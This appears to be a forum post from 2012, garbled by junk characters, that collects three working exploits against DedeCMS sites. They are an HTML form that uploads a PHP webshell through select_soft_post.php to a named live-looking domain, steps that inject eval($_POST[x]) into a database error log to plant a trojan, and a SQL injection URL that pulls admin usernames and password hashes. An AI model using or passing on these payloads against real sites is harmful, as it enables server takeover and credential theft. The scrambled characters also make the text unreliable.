+ f) s3 {# e$ ?% K1 ^7 Y' U
( Q5 V# F7 C% x5 u! a3 x2 N" H4 T1 p# U. o
. C( n$ N [4 ]/ k- R
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
. O$ K" `7 V* ?' P<html>
: W6 y. W, V, V) Z ^( A<head>! r" M n7 w" M- f: }2 N
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title># v8 y) w, J: `6 Q8 p" K
</head>
- f* Q7 }) @; r. L9 Z<body style="FONT-SIZE: 9pt">) K# Q# O4 P, c& W! C) d
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />& h, a6 w( y, s" W# O2 y
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
0 ~5 n8 ?* K7 q2 E/ }8 m' r& l<input type='hidden' name='activepath' value='/data/cache/' />; |; Q+ U; z& U; |0 y8 |, N6 c
<input type='hidden' name='cfg_basedir' value='../../' />- J9 f2 m, d( u- [
<input type='hidden' name='cfg_imgtype' value='php' />" B& K! o% Q6 S& K: [2 D; ]
<input type='hidden' name='cfg_not_allowall' value='txt' />" X3 b* z) e q& R# I& U( B9 M" y, b+ F
<input type='hidden' name='cfg_softtype' value='php' />
( N# Q" g+ W, e% ~0 H<input type='hidden' name='cfg_mediatype' value='php' />$ d# p P+ Q! Q' w b, `
<input type='hidden' name='f' value='form1.enclosure' />( P/ e* p" K5 m4 D# ?/ K
<input type='hidden' name='job' value='upload' />/ p1 g& k7 w( A' S m
<input type='hidden' name='newname' value='fly.php' />4 x8 ]; N/ u. Q4 u) L, L2 M
Select U Shell <input type='file' name='uploadfile' size='25' />
3 w+ I5 A) ^8 z/ M" a<input type='submit' name='sb1' value='确定' />
7 ~4 [. l7 v2 _8 w</form># j. _; J$ g; L& e/ Y
<br />It's just a exp for the bug of Dedecms V55...<br />% Q- `( D1 j" q L! o% E
Need register_globals = on...<br />
; g6 w Y+ ? t: B4 C' Z: NFun the game,get a webshell at /data/cache/fly.php...<br />
) Z, x: U P9 @3 t</body>
0 V+ v6 D/ x- U- F0 O</html>3 W8 e) v9 u( h8 Y( k
- O4 i9 q5 G0 k: `. D/ I
! Q) r, p- a9 d% h: J6 b
' W ^' n8 T4 V3 k# t/ T' l$ x9 V5 J. f6 j
+ Z5 w; ?4 A I7 z8 x" ~
; e: H* s. `9 w8 e* F2 Z3 ^9 [! C1 m# I& b" Y9 f6 H1 p8 c
0 t2 o+ A9 a! a9 @4 f$ U$ h( ^
0 l. j+ y) |& ^6 }: U/ i
& t8 Q/ T9 P' ?% _" M! w: I4 B织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
1 w6 E3 @3 `2 w, b利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。% K0 S! V6 T, e) V3 j1 t; z4 {4 _
1. 访问网址:
0 _5 @' t3 A. a* O2 rhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>3 s; ?- H0 K* A" n2 A2 ^
可看见错误信息
1 X9 I0 W9 g. T. ^# x
7 f+ u' m1 |8 o1 h
- }! s5 k0 y3 z" X( Y2 y' ` i2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
- {6 G$ U0 W7 P! c8 jint(3) Error: Illegal double '1024e1024' value found during parsing* p0 S: @1 l# O9 E
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>6 m, C( i3 r7 c5 p. D
$ D7 t# J" q( m$ g, r
5 [/ d1 e" J+ Z C5 o# u, {+ T# t3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
2 H# s4 f0 k; g+ l. R' q. O6 I5 f# `
1 O% ]* C8 x# e' Z) w# k7 B' Q<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>6 T& t2 v F8 e2 t# U+ l
h2 l4 H# B$ ]% m6 h+ X1 |* L
! j* L# R" s0 o+ M6 Q/ q6 O# G* y按确定后的看到第2步骤的信息表示文件木马上传成功.2 @# p' }9 ]7 I: \
! P5 [+ g, F+ ^6 p% E
: H5 ^' C2 `0 j! L% G* K9 {5 i y+ B4 G6 S7 Y( J5 b
" B) b# c% v2 j4 n
" P: l$ y2 h: p
/ D. u" m# J' I# {% c, Y
2 [# `3 k, J$ T0 c3 t: Q* ~) X8 R- f
% z" a) y0 t$ @- X( k& }% n
3 q% ]; V' ^7 j" D
1 V" v0 m3 H6 K- P; }* e; B8 g: u/ O, g0 {, b5 S' t
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
4 e3 W8 L: ?5 n& Bhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对